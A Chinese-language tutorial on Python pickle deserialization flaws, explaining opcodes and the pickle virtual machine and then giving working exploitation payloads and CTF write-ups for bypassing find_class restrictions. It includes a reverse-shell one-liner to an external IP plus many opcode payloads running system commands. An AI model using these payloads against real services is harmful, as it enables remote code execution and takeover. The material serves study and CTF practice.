前言

学习python反序列化漏洞;总结了一些大佬的博客;所以本文大部分内容都来自参考博客;

本文参考:pickle反序列化初探,python pickle 反序列化总结,python反序列化漏洞

pickle简介

  • 与PHP类似,python也有序列化功能以长期储存内存中的数据。pickle是python下的序列化与反序列化包。
  • python有另一个更原始的序列化包marshal,现在开发时一般使用pickle。
  • 与json相比,pickle以二进制储存,不易人工阅读;json可以跨语言,而pickle是Python专用的;pickle能表示python几乎所有的类型(包括自定义类型),json只能表示一部分内置类型且不能表示?自定义类型。
  • pickle实际上可以看作一种独立的语言,通过对opcode的更改编写可以执行python代码、覆盖变量等操作。直接编写的opcode灵活性比使用pickle序列化生成的代码更高,有的代码不能通过pickle序列化得到(pickle解析能力大于pickle生成能力)。

object.__reduce__() 函数

  • 在开发时,可以通过重写类的 object.__reduce__() 函数,使之在被实例化时按照重写的方式进行。具体而言,python要求 object.__reduce__() 返回一个 (callable, ([para1,para2...])[,...]) 的元组,每当该类的对象被unpickle时,该callable就会被调用以生成对象(该callable其实是构造函数)。
  • 在下文pickle的opcode中, R 的作用与 object.__reduce__() 关系密切:选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数。其实 R 正好对应 object.__reduce__() 函数, object.__reduce__() 的返回值会作为 R 的作用对象,当包含该函数的对象被pickle序列化时,得到的字符串是包含了 R 的。

opcode简介

opcode版本

pickle由于有不同的实现版本,在py3和py2中得到的opcode不相同。但是pickle可以向下兼容(所以用v0就可以在所有版本中执行)。目前,pickle有6种版本。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# coding=utf-8
import pickle

a={'1': 1, '2': 2}

print(f'# 原变量:{a!r}')
for i in range(6):
print(f'pickle版本{i}',pickle.dumps(a,protocol=i))

# 原变量:{'1': 1, '2': 2}
# pickle版本0 b'(dp0\nV1\np1\nI1\nsV2\np2\nI2\ns.'
# pickle版本1 b'}q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.'
# pickle版本2 b'\x80\x02}q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.'
# pickle版本3 b'\x80\x03}q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.'
# pickle版本4 b'\x80\x04\x95\x11\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x011\x94K\x01\x8c\x012\x94K\x02u.'
# pickle版本5 b'\x80\x05\x95\x11\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x011\x94K\x01\x8c\x012\x94K\x02u.'

这里有个小技巧,如果题目过滤了\n;在pickle版本4以上没有\n

pickletools

使用pickletools可以方便的将opcode转化为便于肉眼读取的形式。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import pickle
import pickletools

class test:
def __init__(self):
self.people = 'lituer'
a = test()
serialized = pickle.dumps(a, protocol=3) # 指定PVM 协议版本
print(serialized)
unserialized = pickle.loads(serialized) # 注意,loads 能够自动识别反序列化的版本
print(unserialized.people)
pickletools.dis(serialized)

# b'\x80\x03c__main__\ntest\nq\x00)\x81q\x01}q\x02X\x06\x00\x00\x00peopleq\x03X\x06\x00\x00\x00lituerq\x04sb.'
# lituer
# 0: \x80 PROTO 3
# 2: c GLOBAL '__main__ test'
# 17: q BINPUT 0
# 19: ) EMPTY_TUPLE
# 20: \x81 NEWOBJ
# 21: q BINPUT 1
# 23: } EMPTY_DICT
# 24: q BINPUT 2
# 26: X BINUNICODE 'people'
# 37: q BINPUT 3
# 39: X BINUNICODE 'lituer'
# 50: q BINPUT 4
# 52: s SETITEM
# 53: b BUILD
# 54: . STOP
# highest protocol among opcodes = 2

可读性较强;想要弄懂这个回显的具体内容,我们还要弄得一个东西,PVM

PVM

我们在使用pickler的时候,我们要序列化的内容,必须经过PVM,Pickle Virtual Machine (PVM)是Python语言中的一个虚拟机,用于序列化和反序列化Python对象。它是Python标准库中的一部分,由Python的pickle模块提供支持。下面是Pickle Virtual Machine的运行原理:

  1. 生成操作码序列:pickle模块在序列化Python对象时,会生成一系列操作码(opcode)来表示对象的类型和值。这些操作码将被保存到文件或网络流中,以便在反序列化时使用。
  2. 反序列化操作码:在反序列化时,pickle模块读取操作码序列,并将其解释为Python对象。它通过Pickle Virtual Machine来执行操作码序列。Virtual Machine会按顺序读取操作码,并根据操作码的类型执行相应的操作。
  3. 执行操作码:Pickle Virtual Machine支持多种操作码,包括压入常量、调用函数、设置属性等。执行操作码的过程中,Virtual Machine会维护一个栈来存储数据。当执行操作码时,它会将数据从栈中取出,并根据操作码的类型进行相应的操作。执行完成后,结果将被压入栈中。
  4. 构造Python对象:当操作码序列被完全执行后,Pickle Virtual Machine会将栈顶的数据作为结果返回。这个结果就是反序列化后的Python对象。

常用的opcode

指令 描述 具体写法 栈上的变化
c 获取一个全局对象或import一个模块 c[module]\n[instance]\n 获得的对象入栈
o 寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象) o 这个过程中涉及到的数据都出栈,函数的返回值(或生成的对象)入栈
i 相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象) i[module]\n[callable]\n 这个过程中涉及到的数据都出栈,函数返回值(或生成的对象)入栈
N 实例化一个None N 获得的对象入栈
S 实例化一个字符串对象 S’xxx’\n 获得的对象入栈
V 实例化一个UNICODE字符串对象 Vxxx\n 获得的对象入栈
I 实例化一个int对象 Ixxx\n 获得的对象入栈
F 实例化一个float对象 Fx.x\n 获得的对象入栈
R 选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数 R 函数和参数出栈,函数的返回值入栈
. 程序结束,栈顶的一个元素作为pickle.loads()的返回值 .
( 向栈中压入一个MARK标记 ( MARK标记入栈
t 寻找栈中的上一个MARK,并组合之间的数据为元组 t MARK标记以及被组合的数据出栈,获得的对象入栈
) 向栈中直接压入一个空元组 ) 空元组入栈
l 寻找栈中的上一个MARK,并组合之间的数据为列表 l MARK标记以及被组合的数据出栈,获得的对象入栈
] 向栈中直接压入一个空列表 ] 空列表入栈
d 寻找栈中的上一个MARK,并组合之间的数据为字典(数据必须有偶数个,即呈key-value对) d MARK标记以及被组合的数据出栈,获得的对象入栈
} 向栈中直接压入一个空字典 } 空字典入栈
p 将栈顶对象储存至memo_n pn\n
g 将memo_n的对象压栈 gn\n 对象被压栈
0 丢弃栈顶对象 0 栈顶对象被丢弃
b 使用栈中的第一个元素(储存多个属性名: 属性值的字典)对第二个元素(对象实例)进行属性设置 b 栈上第一个元素出栈
s 将栈的第一个和第二个对象作为key-value对,添加或更新到栈的第三个对象(必须为列表或字典,列表以数字作为key)中 s 第一、二个元素出栈,第三个元素(列表或字典)添加新值或被更新
u 寻找栈中的上一个MARK,组合之间的数据(数据必须有偶数个,即呈key-value对)并全部添加或更新到该MARK之前的一个元素(必须为字典)中 u MARK标记以及被组合的数据出栈,字典被更新
a 将栈的第一个元素append到第二个元素(列表)中 a 栈顶元素出栈,第二个元素(列表)被更新
e 寻找栈中的上一个MARK,组合之间的数据并extends到该MARK之前的一个元素(必须为列表)中 e MARK标记以及被组合的数据出栈,列表被更新

所有opcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
MARK           = b'('   # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding

TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py

# Protocol 2

PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.__new__ to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long

_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]

# Protocol 3 (Python 3.x)

BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes

# Protocol 4

SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame

# Protocol 5

BYTEARRAY8 = b'\x96' # push bytearray
NEXT_BUFFER = b'\x97' # push next out-of-band buffer
READONLY_BUFFER = b'\x98' # make top of stack readonly

opcode源码分析

1
2
3
4
5
6
7
8
9
10
11
import pickle

class test:
def __init__(self):
self.people = 'lituer'
a = test()
serialized = pickle.dumps(a, protocol=3) # 指定PVM 协议版本
print(serialized)

unserialized = pickle.loads(serialized) # 注意,loads 能够自动识别反序列化的版本
print(unserialized.people)
1
'\x80\x03c__main__\ntest\nq\x00)\x81q\x01}q\x02X\x06\x00\x00\x00peopleq\x03X\x06\x00\x00\x00lituerq\x04sb.'

下面分析一整段opcode码的作用

\x80\x03

源码

1
2
3
4
5
6
def load_proto(self):
proto = self.read(1)[0]
if not 0 &lt;= proto &lt;= HIGHEST_PROTOCOL:
raise ValueError("unsupported pickle protocol: %d" % proto)
self.proto = proto
dispatch[PROTO[0]] = load_proto

代码首先从输入流中读取一个字节并将其存储在 proto 变量中。然后,它检查该变量的值是否在合法的 pickle 协议范围内,如果不是,则引发一个 ValueError 异常,指示不支持的协议。最后,它将 proto 变量的值存储在对象的 proto 属性中,这两个字节就是判断版本号的;

c

获取一个全局对象或import一个模块(注:会调用import语句,能够引入新的包)会加入self.stack

源代码:

1
2
3
4
5
6
7
8
9
def load_global(self):
#往后读到换行符作为模块名 __main__
module = self.readline()[:-1].decode("utf-8")
#往后读到换行符作为类名 animal
name = self.readline()[:-1].decode("utf-8")
#进入find_class
klass = self.find_class(module, name)
self.append(klass)#获取模块后添加到当前栈中
dispatch[GLOBAL[0]] = load_global

find_class()函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def find_class(self, module, name):
# 在系统审核日志中记录“pickle.find_class”事件,包括模块名和对象名
sys.audit('pickle.find_class', module, name)
# 如果协议版本小于3且开启了fix_imports标志,则进行特殊的名称和模块映射处理
if self.proto < 3 and self.fix_imports:
# 如果(module, name)在NAME_MAPPING中,则使用映射的名称代替原名称
if (module, name) in _compat_pickle.NAME_MAPPING:
module, name = _compat_pickle.NAME_MAPPING[(module, name)]
# 如果module在IMPORT_MAPPING中,则使用映射的模块名代替原模块名
elif module in _compat_pickle.IMPORT_MAPPING:
module = _compat_pickle.IMPORT_MAPPING[module]
# 动态加载指定模块
__import__(module, level=0)
# 如果协议版本大于等于4,则使用_getattribute方法获取对象
if self.proto >= 4:
return _getattribute(sys.modules[module], name)[0]
# 否则,使用getattr方法获取对象
else:
return getattr(sys.modules[module], name)

然后self.append(klass)添加到当前栈中,所以当前栈中有:

1
self=&gt; stack:[类]

q

对应源码

1
2
3
4
5
6
7
8
9
10
11
12
13
def load_binput(self):
# 从输入流中读取一个字节作为索引,表示待保存对象在memo字典中的位置
i = self.read(1)[0]
# 如果读取到的索引小于0,则引发ValueError异常
if i < 0:
raise ValueError("negative BINPUT argument")
# 将当前堆栈顶部的对象保存到memo字典中,使用读取到的索引作为键值
self.memo[i] = self.stack[-1]
# 将memo字典添加到堆栈中
self.append(self.memo)

# 将load_binput函数注册到pickle库的分发表中,以便在序列化时调用
dispatch[BINPUT[0]] = load_binput

所以记忆栈中存在了test类

1
memo=&gt; stack:[类]

)

1
2
3
def load_empty_tuple(self):
self.append(())#向当前栈中增加一个新的元组
dispatch[EMPTY_TUPLE[0]] = load_empty_tuple

操作完之后栈区就变成了

1
self=&gt; stack:[类,()]

\x81

弹出self栈中的两个元素 然后把参数传入__new__对类进行实例化

1
2
3
4
5
6
7
def load_newobj(self):
args = self.stack.pop() # 空元组()
cls = self.stack.pop() #
obj = cls.__new__(cls, *args)
#__new__方法的作用是修改不可变类(int,String)等基本类都是不可变类,此处不需修改,所以传入元组
self.append(obj) #将实例化的test给self这个self栈中
dispatch[NEWOBJ[0]] = load_newobj

这时的self栈区

1
self=&gt; stack:[(对象)]

q

把self中的对象压入memo栈中

1
2
3
4
5
6
def load_binput(self):
i = self.read(1)[0]#继续读取下一个字节,赋值给i
if i &lt; 0:
raise ValueError("negative BINPUT argument")
self.memo[i] = self.stack[-1]#将栈中的栈尾(与栈顶相对)存入记忆栈中memo
dispatch[BINPUT[0]] = load_binput

当前的memo栈有

1
memo=&gt; stack:[(类) , (对象)]

}

向栈区压入一个空字典

1
2
3
def load_empty_dictionary(self):
self.append({})
dispatch[EMPTY_DICT[0]] = load_empty_dictionary

当前self栈

1
self=&gt; stack:[(对象),{}]

q

1
2
3
4
5
6
def load_binput(self):
i = self.read(1)[0]
if i &lt; 0:
raise ValueError("negative BINPUT argument")
self.memo[i] = self.stack[-1]#将栈中的栈尾栈顶存入记忆栈中memo
dispatch[BINPUT[0]] = load_binput

当前memo栈

1
memo=&gt; stack:[(类) , (对象),{}]

X

源码

1
2
3
4
5
6
7
8
def load_binunicode(self):
len, = unpack('<i>6
if len &gt; maxsize: #这里的6也就是后面的x06也就是属性名字符串的长度
raise UnpicklingError("BINUNICODE exceeds system's maximum size "
"of %d bytes" % maxsize)
self.append(str(self.read(len), 'utf-8', 'surrogatepass'))
#再往后读len长度的字节数 people(属性名) 然后存入到栈中中
dispatch[BINUNICODE[0]] = load_binunicode

所以self栈中就是

1
self=&gt; stack:[(对象),{},"people"]

q

和上面的思路一样,不多赘述了

此时的memo栈中的内容如下

1
memo=&gt; stack:[(类) , (对象),{},"people"]

X

读取后面的\x03识别长度为三的字符串

1
2
3
4
5
6
7
8
def load_binunicode(self):
len, = unpack('<i> 3
if len &gt; maxsize: #读取后面的\x03识别长度为三的字符串
raise UnpicklingError("BINUNICODE exceeds system's maximum size "
"of %d bytes" % maxsize)
self.append(str(self.read(len), 'utf-8', 'surrogatepass')) dog
#再往后读len长度的字节数 lituer(属性值) 然后存入到栈中中
dispatch[BINUNICODE[0]] = load_binunicode

此时self栈中的内容

1
self=&gt; stack:[(对象),{},"people","lituer"]

q

1
2
3
4
5
6
def load_binput(self):
i = self.read(1)[0]#继续读取下一个字节 \x04 ,赋值给i
if i &lt; 0:
raise ValueError("negative BINPUT argument")
self.memo[i] = self.stack[-1]
dispatch[BINPUT[0]] = load_binput

当前memo的栈中的内容

1
memo=&gt; stack:[(类) , (对象),{},"people","lituer"]

s

将栈的第一个对象作为 value,第二个对象作为 key,添加或更新到栈的第三个对象(必须为列表或字典,列表以数字作为 key)中

对应源码

1
2
3
4
5
6
7
8
9
10
    def load_setitem(self):
stack = self.stack
value = stack.pop() #"people"
key = stack.pop() #"lituer"
#弹出这两个对象
dict = stack[-1] #栈顶{}
#
dict[key] = value #{"people":"lituer"}
dispatch[SETITEM[0]] = load_setitem
self=&gt; stack:[(对象),{"people":"lituer"}]

b

使用栈中的第一个元素(储存多个 属性名-属性值 的字典)对第二个元素(对象实例)进行属性设置,调用 setstatedict.update()

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
    def load_build(self):
stack = self.stack
state = stack.pop() #{"people":"lituer"}
inst = stack[-1] #(对象)
setstate = getattr(inst, "__setstate__", None)
if setstate is not None:
#检查是否存在 __setstate__ 方法 一般是不存在的
###############################################
setstate(state) ###########会造成任意函数调用
############################################
return
slotstate = None
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
if state:
inst_dict = inst.__dict__
intern = sys.intern
for k, v in state.items():
if type(k) is str:
inst_dict[intern(k)] = v
else:
inst_dict[k] = v
if slotstate:
for k, v in slotstate.items():
setattr(inst, k, v)
dispatch[BUILD[0]] = load_build
self=&gt; stack:[(拥有数据的对象)

所以最后栈顶的内容就是反序列化后的内容

.

结束反序列化

1
2
3
4
def load_stop(self):
value = self.stack.pop()
raise _Stop(value)
dispatch[STOP[0]] = load_stop

至此整个反序列化过程结束,相信到此为止PVM的工作原理有了一个明确的了解

利用思路

命令执行

__reduce__

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import pickle
import os
import base64

class zIxyd(object):
def __reduce__(self):
s = "whoami"
return os.system, (s,)

payload = zIxyd()
serialze = pickle.dumps(payload)
base64_data = base64.b64encode(serialze)
print(base64_data)
pickle.loads(serialze)

#b'gASVHgAAAAAAAACMAm50lIwGc3lzdGVtlJOUjAZ3aG9hbWmUhZRSlC4='
#king\24603

注意:部分Linux系统下和Windows下的opcode字节流并不兼容,比如Windows下执行系统命令函数为nt.system(),在部分Linux下则为posix.system();

eval函数

1
2
3
4
5
6
7
8
9
10
11
12
import pickle
import base64

class zIxyd(object):
def __reduce__(self):
return (eval, ("__import__('os').system('/bin/bash -c \"bash -i >& /dev/tcp/81.71.13.76/5555 0>&1\"')",))
payload = zIxyd()
pickle_a = pickle.dumps(payload)
encoded_data = base64.b64encode(pickle_a)
print(encoded_data)

#gASVbwAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIxTX19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJy9iaW4vYmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC84MS43MS4xMy43Ni81NTU1IDA+JjEiJymUhZRSlC4=

opcode

可以调用函数的操作码:

R

选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数

1
2
3
4
opcode=b'''cos
system
(S'whoami'
tR.'''

i

相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象)

1
2
3
4
opcode=b'''(S'whoami'
ios
system
.'''

o

寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象)

1
2
3
4
opcode=b'''(cos
system
S'whoami'
o.'''

b+__setstate__()

b操作码对应的是load_build函数; 使用栈中的第一个元素(储存多个属性名: 属性值的字典)对第二个元素(对象实例)进行属性设置

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
def load_build(self):
stack = self.stack
state = stack.pop()
# 获取栈的倒数第二个元素赋值给inst
inst = stack[-1]
# 获取inst对象的__setstate__属性
setstate = getattr(inst, "__setstate__", None)
if setstate is not None:
#检查是否存在 __setstate__ 方法 一般是不存在的
###############################################
setstate(state) ###########会造成任意函数调用 //
############################################
return
slotstate = None
# 如果state是元组类型并且长度为2,将其分解为state和slotstate
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
##如果"__setstate__"为空,则state与对象默认的__dict__合并,这一步其实就是将序列化前保存的持久化属性和对象属性字典合并
if state:
inst_dict = inst.__dict__
intern = sys.intern
# 遍历state字典,将键名intern后赋值给inst_dict,键值直接赋值
for k, v in state.items():
if type(k) is str:
inst_dict[intern(k)] = v
else:
inst_dict[k] = v
# 如果slotstate不为空,遍历slotstate字典,并将其键值对赋值给inst对象
if slotstate:
for k, v in slotstate.items():
setattr(inst, k, v)
dispatch[BUILD[0]] = load_build
1
__setstate__ : 官方文档中,如果想要存储对象的状态,就可以使用__getstat__和__setstat__方法。由于 pickle 同样可以存储对象属性的状态,所以这两个魔术方法主要是针对那些不可被序列化的状态,如一个被打开的文件句柄open(file,'r')。

和他成对的还有 __getstate__ ,被反序列化时调用__setstate__,被序列化时调用__getstate__。重写时可以省略__setstate__,但__getstate__必须返回一个字典。如果__getstate____setstate__都被省略, 那么就默认自动保存和加载对象的属性字典__dict__

目的:

1
当前对象存在属性'__setstate__',并且{'__setstate__': os.system}

第一种来自参考中的博客;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import pickle

class Person:
def __init__(self,age):
self.age=age


opcode=b'''(c__main__
Person
I18
o}(S"__setstate__"
cos
system
ubS"whoami"
b.'''
p=pickle.loads(opcode)
#whoami

# o 寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象)
# u 寻找栈中的上一个MARK,组合之间的数据(数据必须有偶数个,即呈key-value)并全部添加或更新到该MARK之前的一个元素(必须为字典)中

#我把他翻译成人可以看懂的了。如下
# __import__("__main__").Person(18).__setstate__ = __import__('os')
#但是可以看到还是用到了o操作码

我自己根据上一个payload,进行了一点改造;利用\x81返回一个Person对象;这样就不需要用到o操作码了;\x81在opcode源码分析有详细讲

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import pickle

class Person:
def __init__(self,age):
self.age=age

opcode=b'''c__main__
Person
)\x81}(S"__setstate__"
cos
system
ubS"whoami"
b.'''

p=pickle.loads(opcode)

其实我还在一篇博客中看到另一种办法,只不过对于初学者的我来说,并没有完全看懂,先记录下来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
opcode=b'''c__main__
Person
)\x81}X\x0C\x00\x00\x00__setstate__cos
system
sbX\x06\x00\x00\x00whoamib.'''
#字符c,往后读取两行,得到主函数和类,__main__.tttang
#字符),向栈中压入空元祖()
#字符},向栈中压入空字典{}
#字符X,读取四位\x0C\x00\x00\x00__setstate__,得到__setstate__
#字符c,向后读取两行,得到函数os.system
#字符s,将第一个和第二个元素作为键值对,添加到第三个元素中,此时也就是{__main.tttang:()},__setstate__,os.system
#字符b,第一个元素出栈,此时也就是{'__setstate__': os.system},此时执行一次setstate(state)
#字符X,往后读取四位x06\x00\x00\x00whoami,即whoami
#字符b,弹出元素whoami此时state为whoami,执行os.system(whoami)
#字符.,结束反序列化

当然,思路是天马行空的,利用b操作码执行命令肯定不止这几种payload;

\x81

我个人感觉\x81操作码,在导入危险模块(比如builtins)情况下,也可以利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import pickle
import builtins

opcode=b'''c__builtin__
map
p0
0(S'whoami'
tp1
0(cos
system
g1
tp2
0g0
g2
\x81p3
0c__builtin__
bytes
p4
(g3
t\x81.'''

pickle.loads(opcode)

#__import__("builtins").bytes.__new__(__import__("builtins").bytes,__import__("builtins").map.__new__(__import__("builtins").map,os.system,('whoami',)))

变量覆盖

__reduce__

1
2
3
4
5
6
7
8
9
10
11
12
13
import pickle

key1 = b'321'
key2 = b'123'
class zIxyd(object):
def __reduce__(self):
return (exec,("key1=b'1'\nkey2=b'2'",))

payload = zIxyd()
pickle_a = pickle.dumps(payload)
print(pickle_a)
pickle.loads(pickle_a)
print(key1, key2)

opcode

1
2
#secret.py
name = "zIxyd"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#test.py
import pickle
import secret

print("secret:"+secret.name)
opcode=b'''c__main__
secret
(S'name'
S'Hacker'
db.'''
result = pickle.loads(opcode)
print(result.name)

#secret:zIxyd
#Hacker

实例化对象

实例化对象是一种特殊的函数执行,这里简单的使用 R 构造一下,其他方式类似:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# coding=utf-8
import pickle
class Student:
def __init__(self, name, age):
self.name = name
self.age = age

data=b'''c__main__
Student
(S'XiaoMing'
S"20"
tR.'''

a=pickle.loads(data)
print(a.name,a.age)

pickle.Unpickler.find_class()

由于官方针对pickle的安全问题的建议是修改find_class(),引入白名单的方式来解决,很多CTF题都是针对该函数进行,所以搞清楚如何绕过该函数很重要。
什么时候会调用find_class()

  1. 从opcode角度看,当出现cib'\x93'时,会调用,所以只要在这三个opcode直接引入模块时没有违反规则即可。
  2. 从python代码来看,find_class()只会在解析opcode时调用一次,所以只要绕过opcode执行过程,find_class()就不会再调用,也就是说find_class()只需要过一次,通过之后再产生的函数在黑名单中也不会拦截,所以可以通过__import__绕过一些黑名单。

下面先看两个例子:

1
2
3
4
5
6
7
8
9
10
safe_builtins = {'range','complex','set','frozenset','slice',}

class RestrictedUnpickler(pickle.Unpickler):

def find_class(self, module, name):
# Only allow safe classes from builtins.
if module == "builtins" and name in safe_builtins:
return getattr(builtins, name)
# Forbid everything else.
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %(module, name))
1
2
3
4
5
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module == '__main__': # 只允许__main__模块
return getattr(sys.modules['__main__'], name)
raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
  • 第一个例子是官方文档中的例子,使用白名单限制了能够调用的模块为{'range','complex','set','frozenset','slice',}

  • 第二个例子是高校战疫网络安全分享赛·webtmp中的过滤方法,只允许__main__模块。虽然看起来很安全,但是被引入主程序的模块都可以通过__main__调用修改,所以造成了变量覆盖。

由这两个例子我们了解到,对于开发者而言,使用白名单谨慎列出安全的模块则是规避安全问题的方法;而如何绕过find_class函数内的限制就是pickle反序列化解题的关键。
此外,CTF中的考察点往往还会结合python的基础知识(往往是内置的模块、属性、函数)进行,考察对白名单模块的熟悉程度,所以做题的时候可以先把白名单模块的文档看一看:)

CTF实战

Code-Breaking:picklecode

题目将pickle能够引入的模块限定为builtins,并且设置了子模块黑名单:{'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'},于是我们能够直接利用的模块有:

  • builtins模块中,黑名单外的子模块。
  • 已经import的模块:iobuiltins(需要先利用builtins模块中的函数)

黑名单中没有getattr,所以可以通过getattr获取iobuiltins的子模块以及子模块的子模块:),而builtins里有eval、exec等危险函数,即使在黑名单中,也可以通过getattr获得。pickle不能直接获取builtins一级模块,但可以通过builtins.globals()获得builtins;这样就可以执行任意代码了。payload为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import builtins
import pickle

payload=b"""cbuiltins
getattr
(cbuiltins
dict
S'get'
tR(cbuiltins
globals
(tRS'builtins'
tRp1
cbuiltins
getattr
(g1
S'eval'
tR(S'__import__("os").system("whoami")'
tR."""

pickle.loads(payload)

#翻译成人可以看懂的(搞了几十分钟才翻译出来)
# builtins.getattr(builtins.getattr(builtins.dict,'get')(builtins.globals(),"builtins"),"eval")('__import__("os").system("whoami")')

首先执行getattr获取eval函数,再执行eval函数,这实际上是两步,而我们常用__reduce__生成的序列化字符串,只能执行一个函数;所以这题只能搓opcode;这题更多细节可以看p神

高校战疫网络安全分享赛:webtmp

限制:重写了find_class函数,只能生成__main__模块的pickle:

1
2
3
4
5
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module == '__main__': # 只允许__main__模块
return getattr(sys.modules['__main__'], name)
raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

此外,禁止了b'R'

1
2
3
4
try:
pickle_data = request.form.get('data')
if b'R' in base64.b64decode(pickle_data):
return 'No... I don\'t like R-things. No Rabits, Rats, Roosters or RCEs.'

目标是覆盖secret中的验证,由于secret被主程序引入,是存在于__main__下的secret模块中的,所以可以直接覆盖掉,此时就成功绕过了限制:

1
2
3
4
5
6
7
8
9
10
11
b'''c__main__
secret
(S'name'
S"1"
S"category"
